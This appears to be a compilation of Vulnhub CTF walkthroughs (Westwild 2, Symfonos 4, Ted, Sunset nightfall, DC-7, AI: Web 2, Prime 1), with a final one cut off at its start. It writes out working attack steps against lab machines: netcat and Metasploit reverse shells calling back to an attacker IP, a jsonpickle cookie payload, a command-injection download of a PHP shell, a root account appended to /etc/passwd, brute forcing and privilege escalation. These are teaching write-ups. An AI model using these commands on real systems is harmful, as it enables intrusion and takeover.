msf5 exploit(multi/handler) > exploit

msf5 exploit(multi/handler) > sessions -u 1

msf5 exploit(multi/handler) > sessions 2

meterpreter > sysinfo

Today we are going to solve another boot2root challenge called “Westwild: 2”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to Hashim Alsharef. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Browsing HTTP Service

· Directory Bruteforce using dirb

· Using wget to download user and password list

Exploiting

· Bruteforcing Login credentials using BurpSuite

· Searching and Getting Exploit using Searchsploit

· Using Metasploit cmsms_showtime2_rce exploit

Privilege Escalation

· SUID Binaries

· PATH Variable

· LinEnum.sh

· Editing /etc/passwd

· Capture the flag

Walkthrough

Network Scanning

We will start by scanning the network using Netdiscover tool and identify the host IP address.

We can identify our host IP address as 192.168.1.105.

Now let’s scan the services and ports of target machine with nmap. Nmap has a special flag to activate aggressive detection, namely -A. Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).

nmap -A 192.168.1.105

From its result, we found ports 22(SSH), 80(HTTP) were open.

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

We got the CMS: Made Simple Welcome page as shown in the given below image.

Now we further use dirb for directory enumeration. DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analysing the response. This gave us multiple files hosted via the CMS but aspadmin piqued our interest.

dirb http://192.168.1.105

As aspadmin was an interesting result of dirb scan, we decided to browse the URL in our browser.

Further we downloaded user and password list using wget. The Wget command is a command line utility that enables the user to download single or multiple files simultaneously from internet or server by the help of many protocols like HTTP, HTTPS and FTP. This command performs many operations that can be used by any user while downloading any file from the internet such as: Downloading multiple files, downloading in the background, resuming downloading, renaming any downloaded file, Mirror downloading.

wget http://192.168.1.105/admin/aspadmin/user.list

wget http://192.168.1.105/admin/aspadmin/password.list

Exploiting

Bruteforcing Login Credentials

First, we will intercept the request of the login page of the CMS, where we have given a random username and password. Then click on login, the burp suite will capture the request of the login page.

Now we will send the captured request to the Intruder by clicking on the Action Tab. Afterwards we will open the Intruder tab and select positions (username and password) which will get highlighted as shown in the image given. Now we will select the payload position. Firstly, we will press on the Clear button given at right of window frame. Now we will select the fields where we want to attack which is the username and password and click on Add button. Followed by that we will choose the Attack type as Cluster Bomb.

In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

And Boom!!, we got the username and password. Username is west and password is Madison.

And to confirm the username and password, we will enter the matched username and password in the CMS. This will generate a welcome message which shows our success in the simple list payload attack. Here after a bit enumeration we found out that we have a plugin installed named “Showtime2” as shown in the image.

Searchsploit

Now, to exploit the CMS, we will use searchsploit for this task. We searched the plugin in searchsploit as shown in the given image. Searchsploit gave us a Remote Code Execution Exploit. And moreover, it is a part of Metasploit Framework.

searchsploit showtime2

First, we will select the exploit with the help of use command. After that we will select the Remote host IP Address, followed by the username and password that we extracted earlier. Later, we will use exploit command to run the exploit. This will give us a meterpreter shell on the target system. Now that we have the meterpreter, we ran the shell command to get the bash shell. But this we gave us an improper shell, so we will convert it into a proper shell using the python one-liner.

msf5 > use exploit/multi/http/cmsms_showtime2_rce

msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhosts 192.168.1.105

msf5 exploit(multi/http/cmsms_showtime2_rce) > set username west

msf5 exploit(multi/http/cmsms_showtime2_rce) > set password Madison

msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit

meterpreter > shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

And Boom!! we got the shell. Then without wasting any time we searched for any file having SUID or 4000 permission with help of Find command.

By using the following command, you can enumerate all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null

The Find command gave us an interesting file named “network_info”. We will try to enumerate this further.

Privilege Escalation

Now, we need to compromise the target system further to the escalate privileges. PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories that hold all executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with the help of PATH Variable in response to commands executed by a user.

/usr/bin/network_info

cd /tmp

echo “/bin/bash” > ifconfig

chmod 777 ifconfig

export PATH=/tmp:$PATH

whoami

Now to proceed further we will use wget to download LinEnum.sh. Scripted Local Linux Enumeration & Privilege Escalation Checks Shellscript that enumerates the system configuration and high-level summary of the checks/tasks performed by LinEnum.

cd /tmp

wget http://192.168.1.106/LinEnum.sh

chmod 777 LinEnum.sh

./LinEnum.sh

After the successful run of the LinEnum Script, we find some important information that the /etc/passwd file is readable and writable by the user “wside”.

Now let’s edit /etc/passwd file. Sometimes it is not possible to execute passwd command to set the password of a user; in that case, we can use OpenSSL command which will generate an encrypted password with salt.

OpenSSL passwd will compute the hash of the given password using salt string and the MD5-based BSD password algorithm 1.

openssl passwd -1 -salt user3 pass123

After, generating the salted hash we edited the /etc/passwd using echo command to add our password hash.

wside@westside:/tmp$ Echo ‘raj:$1$user3$rAGRVf5p2jYTqt0W5cPu/:0:0::/root:/bin/bash’ >> /etc/passwd

wside@westside:/tmp$ su raj

Hello, guys today we are going to take a new challenge Symfonos:4, which is a third lab of the series Symfonos. The credit for making this VM machine goes to “Zayotic” and it’s another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM HERE.

Level:Intermediate

Penetrating Methodology:

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Browsing HTTP Service

· Directory Bruteforcing using dirb

Exploitation

· SQL injection to bypass Login Form

· Using LFI to read the Logs

· Using SSH log poisoning using PHP malicious script

· Using Metasploit to create PHP reverse shell

· Port Forwarding

· Encoding and Decoding Cookies

Privilege Escalation

· Inject netcat reverse shell into Json Pickle string

· Replacing cookie with Base64 Encoded Reverse Shell

· Getting Root Access

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box. But first, let’s discover the IP Address of the lab. i.e 192.168.0.23
netdiscover

Once the Ip Address is acquired. Now we will run an aggressive scan using nmap for proceed further.
nmap -A 192.168.0.23

Enumeration

For more details, we will need to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service since port 80 is open.

Let’s further enumerate the target machine through a directory Bruteforce. For this, we are going to use the dirb tool. This gave us a page named “atlantis.php” and “sea.php”. After browsing both directories we noticed “sea.php” was redirecting to “atlantis.php”.
dirb http://192.168.0.23/ /usr/share/wordlists/dirb/big.txt -X .php

Exploitation

So, browsing Atlantis.php directory came out to be a Login Form. To further enumerate the form, we tried combinations of SQL Injection. After few tries, we were able to bypass the Login form using ‘or ‘1’=’1’ as a username. And for password we gave any random value.

We got a prompt to select a god after successfully bypassing the Login form. We selected any random god i.e Hades and were redirected to a URL which left us inquisitive.

After seeing all the possibilities, it quickly strikes let’s try Local File Inclusion. After trying to find /etc/passwd file but didn’t succeed, after we thought of reading the log file using LFI. And we successfully did read the logs.

For Reference: https://www.hackingarticles.in/rce-with-lfi-and-ssh-log-poisoning/

So we try to inject malicious PHP command via SSH for poisoning auth logs as shown in the image below, so that hopefully we can use a ‘C’ parameter to run arbitrary systems commands on the Target Machine.

ssh ‘’@192.168.0.23

Indeed we have to way to execute commands on the target machine. To confirm it we simply checked the id of the Target machine.

Time to Fire Up Metasploit, by using Web-Delivery module we have created a malicious link for PHP reverse shell.

use exploit/multi/script/web_delivery

set target 1

set payload php/meterpreter/reverse_tcp

set lhost 192.168.025

exploit

We need to run the above PHP reverse shell in the ‘C’ parameter in the URL as shown in the image.

On successfully executing the Shell, We saw a new session is opened. To get the complete meterpreter we need to interact with the opened session. And to confirm we checked the system information.

sessions 1

sysinfo

We thought of checking the ongoing processes. After looking out, we saw an interesting process which was running on 127.0.0.1:8080 but we didn’t saw it in our Nmap result because it was an internal process.

Let’s forward the port 8080 to our port 8888.

portfwd add -l 8888 -p 8080 -r 127.0.0.1

Once done with port forwarding. We browsed the forwarded port 8888 with Localhost on the browser but where getting redirected to a page /whoami.

I guess we need to manually go back to main page. Then we got a thought that we might have a cookie for the username.

Without wasting time lets intercept the request of this page using Burp Suite. So the cookie is base64 encoded. We need to decode it.

*Since port 8080 was busy with other process. So we change the listening of Burpsuite to any random port. Dont forget to configure it before intercepting the request.

We decoded the cookie using Burp Suite inbuilt decoder. After searching about the decoded string, we came to know it is a jsonpickle string.

{"py/object": "app.User", "username": "Poseidon"}

Making some modification in the jsonpickle string, we added a netcat reverse shell and encoded the whole string into base64.

{"py/object": "__main__.Shell", "py/reduce": [{"py/function": "os.system"}, ["/usr/bin/nc -e /bin/sh 192.168.0.25 5555"], 0, 0, 0]}

We need to replace the old cookie with the new base64 encoded string and forward the request in Burp Suite. Also don’t forget to spawn a netcat listener on port 5555 before forwarding the request on your Kali Terminal.

Privilege Escalation:

We successfully got the netcat session with root access. To confirm we have checked the Id of the user. Only thing left to do is we went inside the ROOT directory and Read our FLAG.
nc -lvp 5555
id
cd/root
ls
cat proof.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Today we are going to take a new challenge Ted. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here

Security Level: Beginner/ Intermediate

Penetrating Methodology:

Scanning

· NMAP

· Dirb

Enumeration

· Browsing the website

· Burpsuite

Exploitation

· Analyze and change php code to get

Privilege Escalation

· Sudo permission for vim command

Walkthrough:

Scanning:

First thing first, scan the vulnerable machine using nmap

nmap -p- -A 192.168.2.6

Here we got only two ports, 80 and 22

We browsed the website on port 80 and got the message hinting that we might get something in cookies

When we intercepted the request, there was a very lengthy value for a cookie. The value for cookie user was a base64 encoded value

After decoding the value gave us a username, we tried to change it to something else but not possible

For a moment, we kept it aside and tried to get all the available directories using dirb

dirb http://192.168.2.6

Here we found one interesting directory named backup

We visited the backup directory on the web server and found a zip file over there

We downloaded the zip file and extracted the contents and found three files

Let’s check the contents of the files starting from

1) index.php

2) user.class.php

3) log.class.php

After carefully analysing the code of file index.php and user.class.php, we came to know that we can try to get base64 encoded value of cookie user by just adjusting a function call from index.php to user.class.php. So, we added one single line in the end to display the base64 value encoded in similar format as the user cookie value but this time with another user i.e. admin

echo base64_encode(serialize(new User(‘admin’)));

Now let’s try to run the php code and check the output of the same,

php user.class.php

we got a base64 encoded value which we will try to use as the value of user cookie

Well the base64 cookie value worked but nothing much helpful, so we started to look for something else. We checked the log.class.php, we found that the Log class is having a includefunction to include a log file but the parameter type_log is not assigned any value. We assigned the valiable with a the path of passwd file as the value.

Also alongside that we made a small change in the user class, we replaced the function call of the Welcome class to the function call of constructor of the Log class.

Now when we tried to run the user.class.php file again, we found that the passwd file was displayed and we got the base64 encoded value which we can use as the cookie.

php user.class.php

When we tried the base64 encoded cookie value in the webpage, we got the passwd file from the target machine, confirming we have a file inclusion vulnerability

Now that we have verified the presence of file inclusion vulnerability, we created a remote code execution file and started the python server

Now we edit the log class to change the file path variable to the url of our shell

Private $type_log = “http://192.168.2.3/shell.php”

After putting the code in place, its time to get the cookie value to execute

php user.class.php

When we used the cookie value and provided the cmd parameter with ifconfig command

While checking the contents, we found a file named credentials.txt.bak

We tried to check the contents and found something like a set of credentials, let’s try to use these credentials

We used the credentials for ssh and got access. While enumerating we found the first flag

ssh sk4@192.168.2.6

cat flag.txt

Now we have to escalate the privilege, we tried to get sudo permissions for current user. We found we have sudo permissions for vim editor

sudo -l

We used privilege escalation through vim editor and got the root shell

sudo vim

:!/bin/bash

cd /root

cat fl4g.txt

We have another CTF challenges for CTF players that named as “Sunset: nightfall” and it can be download from vulnhub from here. The credit goes “whitecr0wz” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill for Compromising this VM to escalate the root privilege shell.

Level: Easy

Task: Boot to Root

Penetrating Methodologies

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Enum4linux

Exploiting

· FTP Brute force

· Injecting blank SSH key

· SSH login

Privilege Escalation

· SUID Binaries

· Sudo Rights

Walkthrough

Network Scanning

Let’s begin with the network scan using netdiscover to identify the host machine IP.

netdiscover

And this gave 192.168.0.24 as Host IP, now we will move toward ports and service scan further.

For deep network scan we always prefer to use nmap aggressive scan and this time also we will go with the same approach, thus will run the below command to enumerate running services and open port.

nmap -A 192.168.0.24

From its scan result, we found that it has multiple open ports for various services but here port 21 i.e. look interesting as it is using pyftplib for ftp.

Enumeration

For more detail we need to start enumeration against the host machine, therefore, we navigate to a web browser for exploring HTTP service but we found nothing at this place.

While enumerating SMB service we found two use name “nightfall” & “matt” with help of Enum4linux.

enum4linux 192.168.0.24

Exploiting

Since we have enumerated two usernames let’s go for brute force attack with the help of hydra and try to find its password for login into FTP

hydra -l matt -P /usr/share/wordlists/rockyou.txt 192.168.0.24 ftp -e nsr

Great!“Cheese” 😊is the password of user “matt” let’s use this credential for ftp login.

We logged into FTP successfully, since we were logged inside the host machine but to access proper shell we need to compromise TTY shell, therefore we decide to upload a malicious file inside /var/www/html but unfortunately we were unable to access that directory.

This is due to pyftplib which is using python library for FTP and might be File sharing is allowed on any particular directory hence we are unable to access /var/www/html directory.

But still we have another approach i.e. SSH key placement which means we will try to inject our created SSH key inside the host machine and access the pty shell of the host machine via ssh and this can be achieved when we will create an .ssh named folder and upload our ssh key inside it.

Thus, in our local machine we created a ssh key with blank passphrase using ssk-keygen and it will create two files. Then we copied id_rsa.pub file into another file and named “authorized_keys” and we need to transfer this file inside host machine.

As we already have FTP access of the host machine therefore it becomes easy to for us to upload authorized_keys inside the .ssh directory which we have created earlier.

So, when we try to connect with ssh as matt user, we got login successfully as shown in the below image. At this phase we have compromised the host machine and to get access of root shell we need bypass user privileges, therefore without wasting time we try to identify SUID enabled binaries with help of find command.

ssh matt@192.168.0.27

find / -perm -u=s -type f 2>/dev/null

So, we found /script/find has SUID permissions and it work similar as Linux-Find utility thus we try to execute /bin/sh command and obtain nightfall shell access.

./find . -exec /bin/sh -p \; -quit

So, we got access of nightfall shell where we found our 1^stflag from inside user.txt file.

But this was limited shell thus to access proper shell as nightfall, we try to apply previous approach of placing blank passphrase ssh key. Therefore inside /home/nightfall we created a .ssh named folder and upload the authorized_key which we had created previously.

Privilege Escalation

Now repeat the same and try to connect with ssh as nightfall and you will get ssh shell like us as shown in below image. Further, we check sudo right for nightfall and observe he has sudo right for cat program which means we can read higher privilege such as shadow.

ssh nightfall@192.168.0.27

sudo -l

we have executed the following command for reading shadow file and obtain some hash value.

sudo cat /etc/shadow

So, we saved the hash of user: root in a text file and then use john the ripper for cracking hash.

Booomm!! We got user: root password: miguel2

Using above credential i.e. root:miguel2 we got the root shell access and inside /root directory we found our final flag.

DC:7 writeup, our another CTF challenges for CTF players and it can be download from vulnhub from here. The credit goes to “DCAU” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill to compromise this VM to escalate the root privilege shell.

Penetration Testing Methodologies

Network Scan

· Nmap

Foot printing

Exploiting

· SSH login

· Abusing Drupal Drush

· Compromising webshell via PHP Backdoor

Privilege Escalation

· Abusing writable Script

· Capture the Flag

Walkthrough

Network Scanning

Let's start with a network scan using an aggressive Nmap scan as we always do, and this time also we will go with the same approach for identify open port for running services.

nmap -A 192.168.1.101

Hmmm! So nmap showed very exciting & cool outcome, specifically on port 80 that is accessible to HTTP service and is also used to operate drupal CMS, additionally 15 submissions for robot.txt is like a cheery on a cake.

Enumeration

Further, we need to start enumeration against the host machine, therefore without wasting time, we navigate to a web browser for exploring HTTP service, and DC:7- Welcome page will opened in the browser that gave us a hint to search “outside the box” and this hint might be connected with internet.

At the end of this web page we observed another hint “@DC7User” which could be any possible username.

By considering the above listed hint, we start footprinting on the @DC7-user and find the DC7-user twitter account. This account contains a link to GitHub: https:/github.com/Dc7User, maybe the author was pointing to this link.

And the github url content a staffdb which is PHP repositories.

So when we have opened the staffdb, here config.php looks more interesting and a note i.e. as depicted below:

“This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.

This isn't a flag, btw, but if you have made it here, well done anyway. :-)”

We found credential from inside config.php as shown below:

Username: dc7user

Password: MdR3xOgB7#dW

With the help of above enumerated credential we try to connect with ssh and after obtaining tty shell we go for post enumeration and start directory traversing.

ssh dc7user@192.168.1.101

At first, we're looking for a directory list where we've found an "mbox" named file that contains an inbox message. The message contains /opt/script/backup.sh as subject of the message, let’s explore more.

nside backup.sh we notice it is using drushwhich is stands for Drupal shell and it is a command line utility that is used to communicate with drupal CMS.

So, I looked at the drush command in google and found a command that was used to change an account's password.

Therefore, we try to change admin password using below command:

drush user-password admin --password=raj

Now, we've changed the password for the admin account to login to Drupal and explore the following URL:

http://192.168.1.101/user/login

After accessing the admin console, it was time to exploit web application by injecting malicious content inside it. Directly writing malicious scripts as web content will not give us the reverse shell of the application but after spending some time, we concluded that it requires PHP module. We, therefore, move to install new module through Manage>Extend>List>Install new module.

You can download the PHP package for Drupal from the URL below and upload the tar file to install the new module.

https://www.drupal.org/project/php

So, when installation is completed, we need to enable to added module.

Again, move to Manage > Extend >filters and enable the check box for PHP filters.

Now use Pentest monkey PHP script i.e “reverse_shell_backdoor.php” to be inject as basic content. Do not forget to add listening IP and Port for obtaining reverse connection. Further change text format into PHP and enable the check box for publish. Keep the netcat listener ON to receive incoming shell.

Now use the Pentest monkey PHP script, i.e. "reverse shell backdoor.php" to be injected as a basic content. Don't forget to add an “listening IP & port” to get a reversed connection. Continue to change the “text format to PHP” and enable the publishing checkbox. Keep the netcat listener ON in order to receive the incoming shell.

When everything is set correctly, click the preview button and you'll get the reverse connection over the netcat.

Great!! we have our netcat session as www-data and if you will check permission on /opt/scripts/backup.sh, you will notice, that www-data has all permission to access or modify this file. We can therefore abuse the rights of the user file for escalating privileges by modifying the contents of the source.

Privilege Escalation

As said above we’ll try to abuse writable permission assign on the script. Thus, we use msfvenom to generate a malicious piece of code for obtaining bash shell.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.106 lport=8888 R

Now copy the generated code and start a another netcat listener on a new terminal.

mkfifo /tmp/ulgg; nc 192.168.1.106 8888 0

/tmp/ulgg 2>&1; rm /tmp/ulgg

Paste the code copied above in the previous netcat session under the www-data shell and wait for some time and get back to another netcat listener.

After some time, you will have access to the root shell, you will now get the final flag in the root directory as shown below.

Today we are going to solve another CTF challenge called “AI: Web: 2”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This is the second box from the series AI: Web. The credit for making this lab goes to Mohammad Ariful. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

Netdiscover
Nmap

Enumeration

Browsing HTTP Service
Performing Directory Bruteforce
Enumerating robot.txt

Exploiting

Exploiting Directory Traversal
Crack password hashes using John The Ripper
Exploiting Command Injection to get a shell

Privilege Escalation

Enumerating exploit 46978
Enumerating for flag

Capture the flag

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.0.3.

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.3

We learned from the scan that we have the port 80 open which is hosting Apache httpd service. And we have the port 22 open which gives us the option to remotely connect to the target machine.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the browser.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called webadmin as shown in the given image.

dirb http://192.168.0.3/

Upon finding the webadmin directory, we opened the URL in our browser. This gave us a Login Prompt. We don’t have any login credentials to proceed further here.

Back to the part, where we initially browsed the webpage, we found a signup option. We clicked that option. This gave us a form with the username option as shown in the image. So, we created a user account with the name “raj”.

On clicking the “OK” button, we get a panel as shown in the image given below. It shows us a welcome message “Welcome to XuezhuLi File Sharing”. This must be a service that is configured on the web server. This service seems interesting.

We googled the name of the service in hope to find any exploit. And we got the exploit db link.

On close inspection, we found that it contains a captured request marked as viewing.php. This shows the path that can be used to view the /etc/passwd on the target system.

viewing.php?file_name=../../../../../../../../../../../../../etc/passwd

Exploiting

So, we captured the request on our target machine using Burp Suite from the userpage.php.

Now we will right click here on the captured requested and select “Send to Repeater” option in the BurpSuite. Here we will change the GET request with the path that we found in the exploit earlier and send the request to get the response. Here we can see that the we have the /etc/passwd. Among all the other users, we found a user named aiweb2.

viewing.php?file_name=../../../../../../../../../../../../../etc/passwd

Even though, we have a user, we don’t have any passwords. We tried to crack the has by usual methods and dictionaries. It turned out to be useless. Then we turned to the Lab Description on the Vulnhub. Here we found a hint given by the lab author “You may need to crack password. Use wordlist SecLists/rockyou-45.txt”. So, we downloaded that wordlist and still tried to crack the hash.

You can download this wordlist by clicking here.

This also was of no use. We went on through research to find a move ahead and after hours and hours of googling and running through guides and manuals. We found that there are some credentials stored inside the /etc/apache2/.htpasswd.

viewing.php?file_name=../../../../../../../../../../../../../etc/apache2/.htpasswd

We modified our request from earlier to go to this path as shown in the image.

This proved to be a successful step. We found a user named aiweb2admin. Now that we have the username and the password hash. We tried to crack the hash using John The Ripper. We downloaded the wordlist mentioned before by the author and named it dict.txt. On running John, The Ripper, we found the password to be “c.ronaldo”

john --wordlist=dict .txt hash.txt

We went back to the user login panel on /webadmin/ and entered the following credentials

Username: aiweb2admin

Password: c.ronaldo

This was a success. We found some text written here, It says” I disallowed some contents from robots.” This was a simple hint for robots.txt.

As we understood the lab author is trying to hide contents from robot. That means we need to enumerate the robots.txt. On the inspection of robots.txt, we found two directories.

/H05Tpin9555/

/S0mextras/

We opened the /H05Tpin9555/, this gave us a form to enter the IP Address, and upon entering the IP Address, the Victim Machine will ping that particular IP Address. We tired and pinged 127.0.0.1. And the result of the command is show in the image given below. This is a simple case of Command Injection Vulnerability.

We will get back to in a minute but we thought of enumerating further another directory hidden in the robots. txt, “/S0meextras/”. We tried multiple ways to enumerate but all we have is this message” For juicy information in this dir”. This means that there is something in this directory. But to access this directory, first we will be needing an access on this machine.

We got back to our command injection. Here after trying multiple ways and different filters, we found that double pipe ‘||’ bypasses the command injection. We tried the id command with double pipe as shown in the image.

||id

Now that we have found our way in, we will use the php shell of pentest monkey to get a session over the target system. First, we will change the IP Address to our attacker machine (Kali).

After making the appropriate changes, we will run a python one liner to create a server on the port 8000. Now we will transfer the php shell to the target system with the wget command with the double pipe. After clicking the submit button, the shell will get uploaded as shown in the image.

||wget http://192.168.0.26:8000/shell.php

Now that the shell is successfully uploaded, we need to execute it by browsing it in our web browser, but before doing that we will create a netcat listener using the command given below. Remember to enter the port number that was in the shell.php file.

nc -lvp 1234

As soon as we execute the shell file, we have a shell over the target system. We have found our way in. Now its time to enumerate that S0mextras directory. As the directory was visible on the outside as a webpage. It must be in the var/www/html/ directory. So, we traversed to that directory. Here we found a directory named webadmin. We entered into that directory to find out targeted directory. In that directory, we ran the ls -al command. We did this to find any hidden directories. Here we found a text file named “.sshUserCred55512.txt”. Upon opening it we found the credentials of a user on the remote system as shown in the given image.

pwd

cd var/www/html

cd webadmin

cd S0mextras

ls -al

cat .sshUserCred55512.txt

So, we decided to login using those credentials. Upon logging in we ran the id command to reveal the user permissions. This gave us a very peculiar information that the user is a member of lxd group.

LXD is a next gen system container manager. It offers the user a similar environment as virtual machines. But using Linux containers. For more information read this wiki.

ssh n0nr00tuser@192.168.0.3

Privilege Escalation

We used the searchsploit to find any exploit related to lxd. And to our better knowledge, we got exactly what we wanted a privilege escalation exploit.

searchsploit lxd

searchsploit -m 46978

cat 46978.sh

So, we downloaded the exploit using the (-m) parameter of the searchsploit command. After successfully downloading we opened the file to read using the cat command. Here we found the instruction of how to use the exploit.

So, we will follow these steps:

Step 1: Download build-alpine on Attacker Machine

So, we downloaded the build alpine using the link provided in the exploit.

wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine

Step 2: Build alpine as root user on Attacker Machine

After that we ran the alpine-build using the following command

bash build-alpine

On running the bash build command a tar.gz file is created in our working directory.

Step 3: Run this script and you will get root on the Victim Machine

Now we will transfer the file to the victim machine, we used the combination of python one liner and wget for this process. Now there seems to be some error in execution. What happens is that when we tried to execute this directly, we are not able execute it properly. But when we try this method, we are successful. We created a bash file named raj.sh and copied the 46978.sh code in this file. After that we provided it with giving the file proper permission to execute. Now we run the file with providing the tar.gz file in parameter.

wget http://192.168.0.26:8000/alpine-v3.10-x86_64-20190905_0123.tar.gz

nano raj.sh

chmod 777 raj.sh

./raj.sh -f alpine-v3.10-x86_64-20190905_0123.tar.gz

Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag and found it. This concludes this lab.

cd /mnt/root/root

cat flag.txt

Prime: 1 Vulnhub Walkthrough

Prime writeup- our other CTF challenges for CTF players and it can be download from vulnhub from here. The credit goes to “Suraj Pandey” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill to compromise this VM to escalate the root privilege shell.

The difficulty level of lab is set easy to intermediate at the phase of initial foothold and once the machine is get compromised the privilege escalation phase is very easy. To capture the flag, you need to find user.txt and root.txt file.

Penetration Testing Methodologies

Network Scan

· Netdiscover

· Nmap

Enumeration

· Abusing web application

· Dirb

· fuzzing

Exploiting

· LFI

· Abusing Wordpress

· Injecting PHP reverse shell payload

· Obtain Meterpreter Session

· Capture the Flag user.txt

Privilege Escalation

· Kernel Exploit (Metasploit)

· Capture the Flagroot.txt

Walkthrough

Network Scanning

This CTF is started to run on a virtual box, so use a virtual box to run this machine. We've got a few hints at the initial phase when the host machine starts up.

We notice following:

· The VM is desgin on “ubuntu 16.04”

· Found a username: “victor”

· Hint for Password.txt file “find password.txt file in my directory”

Time to identify the IP of the host machine with the help of netdiscover. Here we have 192.168.1.101 as an IP host on my network, let's go further to scan the victim's network to identify the open port and services running across it.

Using an aggressive nmap scan, we only found two open ports, i.e. 22 for ssh and 80 for http.

nmap -A 192.168.1.101

Enumeration

Further, we need to start enumeration against the host machine, therefore without wasting time, we navigate to web browser for exploring HTTP service but we didn’t found any thing here.

Then we go to the web directory listing and use the starting directory brute force with the help of dirb. Hmmmm!! Shows two interesting directories, /dev& /WordPress, which means that the host uses the WordPress application.

dirb http://192.168.1.101

Lol! By exploring /dev directory we got a message and that it wasn't useful

We further explored /WordPress and found the WordPress welcome page. When you browse this page, you will also find the username "Victor" which means that the victor could be the admin.

Then we dig further but didn't find anything, so we're using dirb again to list .txt extension files, and fortunately we've found a secret.txt file out of the result.

dirb http://192.168.1.101/wordpress -X .txt

Let’s go for secret.txt file and figure out what is this file has.

Hmmmm! The secert.xt file provided an indication for the github link and the location.txt file.

The github page contains a few commands for Fuzzing, we try to use each command, but it didn't work as if it was aspected. Then we notice "file" as a fuzzy payload that might be another hint, so we used it to fuzz.

So we try to navigate the following url as per hint, and this approach works as shown in the image below.

http://192.168.1.101/index.php?file=

At the end of the web page, the author left us with a comment as a hint.

“Do something better

You are digging wrong file”

If you remember, we got a hint for the "location.txt" file from inside the secret.txt file. So we're trying to call the location.txt file with the given url.

http://192.168.1.101/index.php?file=location.txt

Great!! We have been able to access the file location.txt, which means that it is vulnerable to local file inclusion (LFI). Let's try and take advantage of it.

Also location.txt file gave a hint us to use “secrettire360 as parameter on other php page”.

Exploiting

As per the above observation, we try to exploit LFI by executing the following command to extract / etc / password file.

http://192.168.1.101/image.php?secrettier360=/etc/passwd

Boom!! Boom!! And we've got the/etc/passwd file of the host machine. if you will notice below image here user: Saket is giving indication to look inside his directory i.e. /home/saket for password.txt file.

To get the password file we try to explore the following url:

http://192.168.1.101/image.php?secrettier360=/home/saket/password.txt

And we found the password: follow_the_ippsec

It was time to utilized above enumerated credential for login into WordPress, we therefore try to access the WordPress admin console using the combination of victor: follow_the_ippsec.

After login into WordPress we try to inject malicious php script via theme templates or by installing new plugin, but all of them fail because they have no writable permission.

Providentially, we've seen a secret.php file that also has writeable permission, which means we can write our malicious php code here.

We therefore write use msfvenom following command for generating malicous php code in raw format.

msfveom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=4444 R

Then copied the higlighted code for injected inside secret.php page

So here, we've injected our malicious code and updated the file, and at the same time, we've started a multi-handler to get a backup of the host machine.

When everything is set up, we try to trigger our malicious php script by running the following url:

http://192.168.1.101/wordpress/wp-content/themes/twentynineteen/secret.php

After executing above url we got meterpreter session1 which is limited shell access of host machine and here we found the kernel version, now lets go for post enumeration to find out user.txt file.

From inisde /home/saket we found our 1^st flag user.txt file. Further let’s got for privilege escaltion to access root shell.

Privilege Escalation

As we already know the kernel version of the host therefore without wasting time we look for kernel exploit in the google and found the metasploit module for exploiting the kernel.

Thus we use following module:

msf > use exploit/linux/local/bpf_sign_extension_priv_esc

msf exploit(exploit/linux/local/bpf_sign_extension_priv_esc) > set session 1

msf exploit(exploit/linux/local/bpf_sign_extension_priv_esc) > exploit

Great!! we got another meterpreter session i.e session 2, and after that we get into the root directory and capture the final flag i.e. root.txt

Today we are going to solve another CTF challenge called “Sunset: dawn”. It is available on Vulnhub for the purpose of Penetration Testing practices. This is a box from the Sunset series. The credit for making this lab goes to “whitecr0wz”. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Browsing HTTP Service

· Performing Directory Bruteforce

· Enumerating log files

· Enumerating SMB using Enum4linux

Exploiting

· Connecting via SMB

· Sending files with netcat invocation

Privilege Escalation

· SUID bit on zsh

Capture the flag

Walkthrough

